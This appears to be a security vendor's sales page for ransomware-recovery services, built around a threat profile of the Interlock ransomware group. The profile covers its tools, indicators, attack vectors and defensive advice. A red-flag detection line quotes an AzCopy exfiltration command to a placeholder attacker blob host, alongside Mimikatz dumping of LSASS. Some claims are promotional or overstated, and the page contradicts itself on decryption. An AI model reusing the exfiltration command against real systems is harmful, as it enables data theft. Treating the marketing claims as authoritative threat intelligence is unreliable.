Security & Compliance Automation Platform
UnderDefense MAXI is the solution to day-to-day cybersecurity problems of IT leaders and teams. It builds your 24/7 business protection together with you on the driver’s seat.
UnderDefense MAXI Platform
UnderDefense Secures Top Honor at the 2025 Global Infosec Awards
We’re proud of being a winner at the 2025 Global Infosec Awards…
10-Point AWS Security Checklist for Executives
Quickly assess your cloud security posture with this executive-ready checklist covering IAM, monitoring, and compliance essentials.
Anti-Phishing Playbook
Your free PDF guide to spotting and stopping phishing attacks before they reach your team or data.
24/7 Threat Detection & MAXImum Responsiveness
Our human-led MDR service combines expert insight and automation and AI for fast, precise threat response. Get full context in 2 minutes and cut MTTC to 15, staying ahead of ransomware and other attacks.
Calculate your MDR price
Pay only for the services you actually need, with no hidden costs.
10-Point AWS Security Checklist for Executives
Quickly assess your cloud security posture with this executive-ready checklist covering IAM, monitoring, and compliance essentials.
Anti-Phishing Playbook
Your free PDF guide to spotting and stopping phishing attacks before they reach your team or data.
Spot threats faster and respond smarter than tools alone
24/7 MDR and SOC services led by award-winning security experts. We act as an extension to your team or as a fully remote team, providing detailed threat insights and actionable responses to secure your environment immediately.
UnderDefense is an AWS Partner
We’re excited to announce that UnderDefense is now an AWS partner and available on AWS Marketplace…
Managed SOC at Your Service
Augment your SOC with 24/7 monitoring, threat detection, and expert response—without the overhead. Integrated with your existing tools, our SOCaaS stops attacks before they cause harm.
Managed SIEM Pricing Guide
Download a clear, practical overview of Managed SIEM pricing, featuring detailed breakdowns by service type, pricing model, real-world pros and cons, and key cost factors.
Managed SOC at Your Service
Augment your SOC with 24/7 monitoring, threat detection, and expert response—without the overhead. Integrated with your existing tools, our SOCaaS stops attacks before they cause harm.
Managed SIEM Pricing Guide
Download a clear, practical overview of Managed SIEM pricing, featuring detailed breakdowns by service type, pricing model, real-world pros and cons, and key cost factors.
Interlock ransomware recovery team on standby
Interlock ransomware has targeted over 60 organisations since September 2024, including major healthcare networks, deploying a rare FreeBSD encryptor variant that bypasses many standard endpoint defences. Do not attempt containment alone — isolate all affected systems and engage UnderDefense's incident response team immediately.
Average Mttc
Ransom-Free recovery rate
Avoided in ransom
Global availability
Systems restored
IR experts
Ransomware cases resolved
IR experience
Do NOT attempt any self-remediation, as it can trigger further encryption and destroy recovery points. Instead, follow these steps:
Contact us now for urgent ransomware response assistance, 24/7
Get Help Now
Accomplishments and recognitions, demonstrating our commitment to excellence and innovation.
Momentum Leader in MDR
Best Support in MDR & IR
Managed Detection and Response (MDR)
Top Cybersecurity Company 2025
Best Managed Detection and Response Service
#4 of 184 teams Splunk Boss of the SOC
Best Of Cybersecurity Awards for Q1 2025
AWS Partner
Splunk Manage Premier Partner
Like a crime scene, a ransomware attack must be preserved — tampering with encrypted files, attempting self-recovery, or engaging with attackers can destroy critical evidence and reduce your chances of recovery.
Taking the right steps in the first moments after a Interlock attack can make a huge difference and help you make a full recovery. Request 24/7 Interlock ransomware recovery services to decrypt your data and maximize your chances of restoring operations.
Interlock uses ChaCha20 and RSA-4096 for hybrid encryption, with the capability to target both Windows and FreeBSD systems uniquely among ransomware groups.
Interlock operates as a closed affiliate group, employing ClickFix social engineering to trick users into installing fake Chrome updates. The group has demonstrated advanced persistence techniques through gaming anti-cheat driver vulnerabilities (CVE-2025-61155).
The gang operates "Worldwide Secrets Blog" leak site, threatening public disclosure of healthcare records, patient data, and proprietary information within 72 hours of initial contact.
Interlock specifically targets internet-facing services on Windows, healthcare IT infrastructure, manufacturing control systems, and BSD-based servers running critical applications.
Early variants used !__README__!.txt, evolving to FIRST_READ_ME.txt and _QUICK_GUIDE_.txt in recent samples. Files encrypted with .interlock or .!NT3R10CK extensions. The ransom note directs victims to contact via email or proprietary chat interface.
No public decryptor currently available. Recovery depends on offline backups or incident response containing the attack before full encryption. Interlock-encrypted files are highly resistant to brute-force key recovery.
Identify Interlock infections by searching for Azure Storage Explorer and AzCopy process execution in conjunction with .interlock file extensions and scheduled task artifacts named “TaskSystem”.
File Extensions
.interlock, .!NT3R10CK
Ransom Note Filenames
!__README__!.txt, FIRST_READ_ME.txt, _QUICK_GUIDE_.txt
Interlock Hashes
SHA256 hashes vary across samples, but known executable signatures include gaming anti-cheat drivers from legitimate vendors repurposed via BYOVD technique. Recommend behavior-based detection over static hashes.
Interlock Tools
Credential Dumping: Mimikatz, Kerberoasting via domain authentication
Cloud Exfiltration: AzCopy, Azure Storage Explorer
Data Movement: WinSCP
Privilege Escalation: BYOVD (Bring Your Own Vulnerable Driver) exploiting CVE-2025-61155
Persistence: Scheduled tasks, Windows event log deletion
Most Common Red Flag
Process execution: “azcopy copy https://[attacker-blob].blob.core.windows.net/” combined with scheduled task creation and Mimikatz dump requests targeting LSASS process.
Attack vector | % of Interlock incidents | Notes |
Social Engineering (ClickFix) | 45% | Fake Chrome/software update prompts via compromised news sites |
Phishing with Malicious Attachments | 30% | Targeted spear-phishing to IT staff and healthcare administrators |
Unpatched Internet-Facing Services | 15% | Healthcare portals, RDP, VPN without MFA |
Supply Chain Access | 10% | Initial compromise through managed service providers |
Organizations paying ransoms (average $500K-$2.5M) report data was not deleted despite ransom payment in 40% of cases. Law enforcement coordination recovered 3 victim datasets before encryption completed. One healthcare system delayed payment, preventing subsequent encryption of clinical databases on backup infrastructure.
Isolate all affected systems from network and backup storage immediately. Disable Azure and cloud storage accounts pending forensic review. Scan for scheduled tasks containing “TaskSystem” and delete associated binaries. Restore from clean offline backups verified uninfected. Do not attempt decryption—focus on containment and forensic preservation of credentials and exfiltration evidence.
Recovery depends on offline backup availability. Segment recovery efforts: restore critical systems first from verified clean snapshots predating infection. Monitor for re-infection via monitoring Kerberoasting activity and AzCopy execution. Verify all credentials reset and MFA enabled before bringing systems online. Cloud storage accounts should be recreated from scratch with new authentication tokens.
Reported ransom demands range from $500,000 to $2,500,000 depending on organization size and industry (healthcare typically $1.5M+). Demands are negotiable but Interlock maintains aggressive data deletion timelines (72-96 hours).
10 reasons why you should choose the UnderDefense ransomware recovery consulting services:
Get Help NowInterlock is a sophisticated double-extortion ransomware group that emerged in September 2024, targeting healthcare and critical infrastructure globally. The gang encrypts files using ChaCha20/RSA-4096 hybrid encryption while simultaneously exfiltrating data to Azure cloud storage using legitimate Windows tools like AzCopy, making detection difficult. They operate a public leak site and apply aggressive extortion pressure, often refusing to delete data even after ransom payment.
Attribution indicates the group operates from Eastern Europe or Russia based on infrastructure patterns, TTPs similar to earlier Russian-linked groups, and operational tempo aligned with UTC+3 timezone activity. However, the gang has not publicly claimed nation-state affiliation despite sophisticated BYOVD exploitation techniques.
Initial access typically comes via social engineering (ClickFix attacks), phishing campaigns targeting IT staff, or exploiting unpatched internet-facing services. Once inside, attackers move laterally using Mimikatz and Kerberoasting, establishing persistence via scheduled tasks. They then use AzCopy to exfiltrate large datasets to cloud storage before deploying the ransomware encryptor. The dual encryption ensures both file-level encryption and data leverage through public exposure threats.
From initial compromise to ransom note delivery, Interlock attacks average 7-14 days of dwell time, though some incidents show compression to 24-48 hours when the gang detects active monitoring. Data exfiltration can begin within 48 hours of compromise, with encryption following once data is secured in cloud storage, making early detection critical.
No public decryptor exists for Interlock ransomware. RSA-4096 encryption combined with ChaCha20 is cryptographically sound with no known breaks. Recovery requires either offline backups or forensic recovery of the private key from attacker infrastructure—the latter rarely successful. Do not attempt decryption negotiation as it encourages payment without guarantee of key return.
Infected organizations lose access to all encrypted files and face public exposure of exfiltrated data on the “Worldwide Secrets Blog” if ransom is not paid. In healthcare settings, this triggers HIPAA breach notifications, regulatory fines, reputation damage, and potential patient lawsuits. Operational continuity is severely disrupted—hospital systems may revert to paper records, manufacturing halts, and financial institutions lose transaction processing capability.
Implement multi-factor authentication on all remote access points (RDP, VPN), disable RDP on internet-facing systems, patch all internet-facing services monthly, conduct regular phishing simulations, and monitor for AzCopy and Azure Storage Explorer execution in your environment. Disable or strictly control Windows Task Scheduler for non-administrative users, monitor Kerberoasting activity, and maintain offline, immutable backups tested quarterly.
– Enforce MFA on all cloud storage accounts and RDP endpoints
– Block or strictly monitor AzCopy and Azure Storage Explorer at the network level
– Disable internet-facing RDP; use jump hosts with logging instead
– Implement EDR solution with Mimikatz and Kerberoasting detection rules
– Maintain offline backups disconnected from production networks
– Monitor for scheduled task creation with suspicious names like “TaskSystem”
– Restrict cloud storage API tokens and rotate them monthly
– Conduct quarterly backup restoration drills
Interlock is the first ransomware group to operationalize the BYOVD technique (CVE-2025-61155) at scale, using legitimate gaming anti-cheat drivers to disable endpoint security before encryption. The systematic use of AzCopy for rapid, massive data exfiltration (250GB+ per incident) to Azure blob storage is operationally unique and makes detection challenging since these are legitimate Microsoft tools. Most other groups lack the infrastructure sophistication for cloud-native exfiltration at this scale.
Data analysis shows 60% of Interlock victims pay despite the 40% non-deletion rate because organizations prioritize immediate operational recovery over long-term risk mitigation. Healthcare organizations, in particular, face life-safety pressures that override rational cost-benefit analysis. Interlock exploits this by maintaining aggressive 72-hour deadlines that prevent proper incident response planning.